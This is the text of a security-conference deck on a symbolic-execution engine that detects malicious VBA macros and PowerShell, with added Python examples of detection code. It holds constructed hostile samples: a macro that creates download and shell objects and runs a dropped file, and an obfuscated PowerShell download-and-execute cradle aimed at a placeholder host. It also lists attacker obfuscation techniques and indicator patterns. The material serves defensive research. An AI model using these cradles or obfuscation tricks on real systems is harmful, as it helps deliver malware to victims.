#RSAC
Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats
Session ID: HTA-R11
Rotem Salinas, Senior Security Researcher, RSA, [email protected], @rotemsalinas
Uri Fleyder-Kotler, Advanced Threats Research Lab Manager, RSA, [email protected], @ufleyder
Houston We Have a Problem
Agentless/non-malware attacks are a rapidly growing threat
Attackers are implementing stealthier methods to bypass defenses
Research Goals
Goals
— Find a way to assess a script’s “maliciousness” automatically
— Do it without the potential harm of infection
— Make it fast!
Narrow the problem space
— VBA
— Powershell
— Not focused on the code extraction
The same concepts can apply to similar problems
The “Imaginary Engine”
How can we develop such a 1337 imaginary engine?
Problem solving in 3 basic steps
— Analyze
— Brainstorming
— Implementation
The First Step – Malware Analyst Standpoint
Traditional Static Analysis Approach
— Determine Execution Flow
— Deobfuscate
— Find Suspicious Activity
Perception Test – What Do Attackers Do?
The First Step – Understanding The Attacker’s Mindset
The First Step – The Attacker’s Main Objectives
Objective: Indicators
Code execution: Prerequisite, Spawning New Processes/Threads
Persistency: Disk operations, Registry operations
Stealth: OS manipulation
Enumeration: Registry operations, Enumeration
Command & Control / Data Exfiltration: Network operations
Lateral Movement: Network operations, Enumeration
Case Study – Dridex Campaign
Peaked during 2015-2016
Used Macros in Office Documents to deploy Dridex variants
Targeted many companies and financial entities around the world
Delivered in large-scale Spam/Spear-Phishing campaigns
Case Study 1 – Dridex Campaign
Entrypoint – This is where the code starts its execution
Non-Linear Code Execution - GoTo jumping to labels
COM Object Creation
URL De-Obfuscation + Http Request Creation
Sending GET request
Initializing ADODB object to write file to disk
Writing Response Body Data to disk
Executing Downloaded File
Case Study – Anunak/Carbanak
Financial APT
Only 1 submission to VT
Attributed to Anunak Cybergang
Final payload
— VBS/Powershell
— PE Executable
See Full Analysis in Appendix
The Second Step – Brainstorming
Common approaches, pros and cons
Hooking
— Use available source code or patch existing dll/exe
— Inserting code that would sink certain expressions
— Remove potentially harmful code
Taint Analysis / Symbolic Execution
— Implement an engine that would emulate the language interpreter
— The engine should evaluate each line of code
— Instead of invoking potentially harmful expressions it would sink them
We Have a Winner!
Symbolic Execution
Pros
— Cannot harm the machine in any way (even if we missed something)
— We know exactly how it works. NO Reverse Engineering!
— Not limited to specific platform/OS
Cons
— Hard to Implement
— Might lack some language functionality
Symbolic Execution: Double Sweep Method
First sweep
— Global context: Global variables, Code
— Function declarations
— External DLL declarations
Second sweep
— Function code - starts with Entrypoint
— Follows execution flow
— Executes stubs instead of built-in language functions
— Evaluates expressions: Math, String manipulation, Logical expressions (condition evaluation)
Implementation Details
Python
— PyParsing
— Dave Beazley’s (Python guru) PLY – Python Lex Yacc
— Lex – lexical analysis/tokenizer
— Yacc (Yet Another Compiler Compiler) – Syntax Analyzer
BNF – Backus Naur Form
Where to start? RTFM
Lexical Analyzer (Tokenizer)
Tokens
— Language keywords
— Immediate values: Strings, Integer/numeric values, Floating point values, Arrays/compound data-types
— Identifiers – variable names, function names, object names
— Operators – math, bitwise, logical, string manipulation
* Diagram courtesy of David Beazley
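An added example of the tokenizer stage for a VBA subset (not the deck's code, and using Python's re module instead of PLY): each token rule is a named regex joined into one master pattern, the way PLY's lex does it; keywords are split out of identifiers, VBA's doubled-quote string escape is unescaped, and a character no rule knows raises an error.

```python
import re

# Token rules in PLY's spirit: (NAME, regex), tried in order; the master regex is
# built from named groups just as PLY's lex builds it. Pure re so it runs without PLY.
KEYWORDS = {"sub", "function", "end", "dim", "set", "as", "goto", "if", "then", "else", "call"}
TOKEN_SPEC = [
    ("STRING",   r'"(?:[^"\n]|"")*"'),          # VBA escapes a quote by doubling it
    ("FLOAT",    r'\d+\.\d+'),
    ("INTEGER",  r'\d+'),
    ("IDENT",    r'[A-Za-z_]\w*'),              # keywords are split out after matching
    ("OP",       r'<>|<=|>=|[&=+\-*/()<>,.:]'),  # concat, math, comparison, punctuation
    ("COMMENT",  r"'[^\n]*"),
    ("NEWLINE",  r'\n'),
    ("SKIP",     r'[ \t]+'),
    ("MISMATCH", r'.'),                         # anything else is a lexing error
]
MASTER = re.compile("|".join("(?P<%s>%s)" % pair for pair in TOKEN_SPEC))

def tokenize(src):
    """Return a list of (type, value, lineno) tuples for a VBA source fragment."""
    tokens, lineno = [], 1
    for m in MASTER.finditer(src):
        kind, value = m.lastgroup, m.group()
        if kind in ("SKIP", "COMMENT"):
            continue
        if kind == "MISMATCH":
            raise SyntaxError("line %d: unexpected character %r" % (lineno, value))
        if kind == "IDENT" and value.lower() in KEYWORDS:
            kind = "KEYWORD"
        elif kind == "STRING":
            value = value[1:-1].replace('""', '"')   # strip quotes, unescape doubled quotes
        elif kind in ("INTEGER", "FLOAT"):
            value = float(value) if kind == "FLOAT" else int(value)
        tokens.append((kind, value, lineno))
        if kind == "NEWLINE":
            lineno += 1
    return tokens

def token_types(src):
    """Just the token kinds, which is what the parser's grammar rules consume."""
    return [kind for kind, _, _ in tokenize(src)]

if __name__ == "__main__":
    # Constructed sample line in the style of the Dridex macro shown in the case study.
    for tok in tokenize('Set o = CreateObject("ADODB.Stream")  \' constructed sample\n'):
        print(tok)
```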
Syntax Analyzer (Parser)
Parses the language syntax according to the tokenized output from the lexer
The language syntax/grammar is defined by multiple functions
Each function represents a BNF production and passes the parsed/extracted values on to the next function according to the BNF statement
PLY Lex Example
Tokenizer Demo
PLY Yacc Example
Engine Design Overview
Scoring
— Blacklist (score++)
— Whitelist (score--)
— A higher score -> more malicious
— If score >= threshold Then isMalicious = True
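An added example that ties the double sweep method to the scoring above (not the deck's engine): the first sweep collects the global context and procedure bodies, the second sweep runs the entrypoint with CreateObject and Shell replaced by stubs that only record their resolved argument, and the recorded sinks are scored against a blacklist and whitelist. The indicator weights and the sample macro are constructed; only string literals, Chr() and "&" concatenation are evaluated, which is enough for the Dridex-style ProgID obfuscation in the case study.

```python
import re
# Added example, not the deck's engine: weights and the sample macro are constructed.
BLACKLIST = {"microsoft.xmlhttp": 3, "adodb.stream": 2, "wscript.shell": 3, "shell": 3}
WHITELIST = {"excel.application": -1, "word.application": -1}   # benign Office automation
THRESHOLD = 4
PIECE = re.compile(r'"([^"]*)"|Chr\((\d+)\)|([A-Za-z_]\w*)', re.I)  # literal | Chr(n) | variable
CALL = re.compile(r'\b(CreateObject|Shell)\b\s*(.*)$', re.I)         # built-ins replaced by stubs
ASSIGN = re.compile(r'^(?:Set\s+|Const\s+)?([A-Za-z_]\w*)\s*=\s*(.+)$', re.I)

def resolve(expr, env):
    """Evaluate literals, Chr() and variables joined by '&'; any other syntax is skipped."""
    return "".join(chr(int(code)) if code else env.get(name.lower(), "") if name else lit
                   for lit, code, name in PIECE.findall(expr))

def first_sweep(src):
    """Sweep 1: collect the global context (module-level lines) and each procedure body."""
    globs, procs, cur = [], {}, None
    for line in (l.strip() for l in src.splitlines()):
        m = re.match(r'^(?:Sub|Function)\s+(\w+)', line, re.I)
        if m:
            cur = m.group(1).lower(); procs[cur] = []
        elif re.match(r'^End\s+(Sub|Function)', line, re.I):
            cur = None
        elif line:
            (procs[cur] if cur else globs).append(line)
    return globs, procs

def second_sweep(globs, procs):
    """Sweep 2: run globals, then the entrypoint; CreateObject/Shell stubs only record their target."""
    env, sinks = {}, []
    entry = next((p for p in ("autoopen", "document_open", "workbook_open") if p in procs), None)
    for stmt in globs + procs.get(entry, []):
        call = CALL.search(stmt)
        if call:
            sinks.append((call.group(1).lower(), resolve(call.group(2), env)))
        asg = ASSIGN.match(stmt)
        if asg:   # an object variable remembers which ProgID its CreateObject resolved to
            env[asg.group(1).lower()] = sinks[-1][1] if call else resolve(asg.group(2), env)
    return sinks

def analyze(src):
    """Return (score, sinks, verdict): blacklist hits raise the score, whitelist hits lower it."""
    sinks = second_sweep(*first_sweep(src))
    keys = [target.lower() if func == "createobject" else func for func, target in sinks]
    score = sum(BLACKLIST.get(k, 0) + WHITELIST.get(k, 0) for k in keys)
    return score, sinks, score >= THRESHOLD

SAMPLE = '''Const p = "Micro" & "soft.XML" & "HTTP"
Sub AutoOpen()
    Set h = CreateObject(p)
    Set s = CreateObject("ADO" & "DB." & Chr(83) & "tream")
    Shell "cmd.exe /c " & "dropped.exe"
End Sub'''
```

Control flow (GoTo, conditions) is deliberately not modelled here; the deck lists condition evaluation and recursion as the hard parts of the real engine.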
Obfuscation As Heuristics
Obfuscation can be a strong indicator for malicious behavior
Examples
— Object returned from function call
— Object created from function call return value string
More Examples
— Self modifying code (during runtime)
— Data read from controls embedded in the document is considered suspicious
Demo: The Engine
The Age Old Question of FP vs. FN
False positives
False negatives
Decide what works best for you!
Lessons Learned
Challenges
— Condition evaluation
— Recursion limit
Lessons
— When in doubt, bruteforce!
— Use the language specification guide as a guideline rather than implementing every language feature that exists
Apply
DIY 1: Develop It Yourself
DIY 2: Deploy In Your Organization
— Network
— Endpoint
Use for your investigations
Q&A
Rotem Salinas @rotemsalinas
Uri Fleyder-Kotler @ufleyder
VBA Indicators of Suspicious Activity
File System Operations
— COM Objects: Scripting.FileSystemObject, ADODB.Stream
— Cmd – output redirect/copy/del/move
— Open builtin function
— Importing External DLLs - URLMON
Network Operations
— COM Objects: Microsoft.XMLHTTP, WinHttp.WinHttpRequest
OS Manipulation
— Importing External DLLs – KERNEL32
— WMI Objects
Registry
— Importing External DLLs – ADVAPI32
Enumeration
— WMI Objects
— Cmd – net share/net use/ipconfig/environment variables
Obfuscation
— Self Modifying Code: Eval, CodeModule
— Obfuscation Beyond Reasonable Doubt
Indicator categories
— COM Object Creation
— WMI Objects Creation
— Self Modifying Code: Eval, CodeModule
— Built-In Functions
— Importing External DLL
— Obfuscation Beyond Reasonable Doubt
VBA – COM Object Creation – Network Activity
Rule of thumb - If your Office Documents are communicating, you are in serious trouble
Network Activity - COM Objects
— Microsoft.XMLHTTP
— MSXML2.SERVERXMLHTTP.6.0
— MSXML2.SERVERXMLHTTP
— MSXML2.XMLHTTP
— WinHttp.WinHttpRequest.5.1
— WinHttp.WinHttpRequest
— InternetExplorer.Application
VBA – COM Object Creation – File System Activity
Scripting.FileSystemObject
ADODB.Stream
VBA – COM Object Creation – Command Execution
WScript.Shell
Shell.Application
VBA – COM Object Creation – Obfuscation
XStandard.Base64
MSXML2.DOMDocument.3.0
MSXML2.DOMDocument
VBA – Built-In Functions
— CreateObject – Create COM object by String Object Name
— GetObject – Create WMI/COM object
— Eval – Covered In Self-Modifying
— ExecuteGlobal – VBS specific
— CallByName – Calls a Function/Method by string name
— Shell – Executes a Command
— Environ – Evaluates Environment Variables
— Kill – Deletes a File
— Application.Run – Calls a Function by String Name
VBA – WMI Object Creation
WMI moniker string: winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2
VBA – Self-Modifying Code – Code Module
CodeModule – Allows modifications of the VBA code
VBA – Self-Modifying Code – Eval
Eval - Evaluates an expression and executes its code
ExecuteGlobal
VBA – Open Built-In Function
Write to File with Open Built-In Function
VBA – Importing External DLL
Win32 API
Appendix – Case Study 1 A - Dridex
Entrypoint – This is where the code starts its execution
Non-Linear Code Execution - GoTo jumping to labels
COM Object Creation
URL De-Obfuscation + Http Request Creation
Sending GET request
Initializing ADODB object to write file to disk
Writing Response Body Data to disk
Executing Downloaded File
Appendix – Case Study 1 B - Dridex
Defining Globals
Entrypoint
Create obfuscated COM object
Create more obfuscated COM objects
Deobfuscate URL and create GET request
Send GET request
Receive Response Body and write to File
Save To Disk
Execution
Appendix – Case Study 2 - Anunak
Entrypoint
De-obfuscate
Beacon and Deploy final Payload
De-Obfuscate
Beacon Command & Control – Phase 1
Deobfuscate
Beacon Command & Control – Phase 2
Deobfuscate
Deploy Base64 Payload
Write Base64 Decoded Payload to Temp Path
Execute Payload
Analyzing Payload 1
— Payload is an icon, used for credibility
— Attempts to gain persistency on the Victim’s machine both by using known Autorun registry paths and by creating a scheduled task using the schtasks command
Appendix – Powershell Indicators of Suspicious Activity
.NET Objects
— .NET Reflection
— Add-Type
— New-Object
WinAPI32 DLL Loading
WMI Objects
— Invoke-WmiMethod
Command Execution
— Invoke-Command
COM Objects
— New-Object -Com
Appendix – Powershell Obfuscation
Obfuscation Methods
— Base64
— SecureString
— Custom Decoding Methods
Powershell Techniques - .NET Reflection
Example 1 – LoadWithPartialName
Example 2 - LoadName
Powershell Techniques - Add-Type .NET code injection
Creation of a new type/class using .NET code
Creating an instance of the class and invoking its Start method
Powershell Techniques – New-Object
Creating an object instance
In this example a System.Net.WebClient instance is created in order to download a file
Powershell Techniques - Invoke-WmiMethod
Using WMI for enumeration and system manipulation
In this case creating a key in the Windows registry
Powershell Techniques - DLL loading
Resolving Native Win32 API functions
$module = "kernel32.dll"
API Function to be resolved
Powershell Techniques - New-Object -Com
Similarly to the COM objects in VBA, the same COM objects can be used in Powershell using this command
Powershell Techniques – Obfuscation
Obfuscation methods in Powershell
— Adding Ticks (escapes special characters, but ignored when used on non-special characters) + Lowercase/Uppercase
— String Concatenation/Manipulation
— Get-Command + WildCards + Aliases
— Invoke-Expression
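An added defender-side example for the tick, case and concatenation tricks listed above (not the deck's engine): decorative backticks are removed while real escape sequences such as `n are kept, adjacent quoted literals joined with + are folded, the result is case-folded, and a constructed indicator list is matched against the normalised command. The sample command line is constructed, with a placeholder URL.

```python
import re

# Added example, not the deck's engine: a normaliser for the tick and concatenation
# tricks, with a constructed indicator list (extend it from the Powershell indicator slides).
REAL_ESCAPES = set("0abefnrtuv`\"$")   # PowerShell escape sequences (`e and `u are PowerShell 6+)
INDICATORS = ("invoke-expression", "iex", "new-object", "add-type", "invoke-wmimethod",
              "net.webclient", "downloadstring", "downloadfile", "frombase64string")
CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")

def strip_ticks(s):
    """Drop decorative backticks: Ne`w-Ob`ject -> New-Object, but `n and `" are kept."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "`" and i + 1 < len(s) and s[i + 1].lower() not in REAL_ESCAPES:
            i += 1                  # skip the tick, keep the character it "escaped"
            continue
        out.append(s[i]); i += 1
    return "".join(out)

def join_concats(s):
    """Fold 'a'+'b'+"c" into a single literal, repeating until nothing changes."""
    prev = None
    while prev != s:
        prev, s = s, CONCAT.sub(lambda m: "'%s%s'" % (m.group(2), m.group(4)), s)
    return s

def normalize(cmd):
    """Case-fold after undoing the obfuscation, so indicator matching is case-insensitive."""
    return join_concats(strip_ticks(cmd)).lower()

def indicators(cmd):
    """Indicators present in the normalised command line, in INDICATORS order."""
    n = normalize(cmd)
    return [i for i in INDICATORS if i in n]

# Constructed sample in the style the slide describes (ticks, mixed case, concatenation).
SAMPLE = "IE`X (Ne`w-Ob`jEcT ('Net.We'+'bCli'+\"ent\")).D`ownl`oadStr`ing('http://placeholder.invalid/')"
```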
Powershell Techniques – Obfuscation - Base64
Base64 using .NET classes
CertUtil – by executing the certutil tool as a command:
certutil -decode encodedInputFileName decodedOutputFileName
Case Study 3 – Targeted Spear Phishing Campaign
Javascript outer script with obfuscated strings
— Base64 encoded payloads
— Each string in the list is reversed
— A list of strings including commands and base64 encoded payloads
Deploys 3 Powershell scripts on the victim’s machine
Payload 1 – .NET code injection using Add-Type
— Creation of a new type/class using .NET code
— Creating an instance of the class and invoking its Start method
Payload 2 – .NET code injection using Add-Type like the 1st payload
— Imports multiple Win32 API functions using .NET
Payload 3 – Downloads TOR Proxifier as scheduled task
Case Study 4 – Powersploit + Invoke-Obfuscation
Open source project available on GitHub
PowerSploit includes capabilities such as:
— Shellcode injection
— Reflective DLL injection
— WMI
— Code execution
— Mimikatz – NTLM/LM password dump
Invoke-Obfuscation is a Powershell code obfuscation framework developed by Daniel Bohannon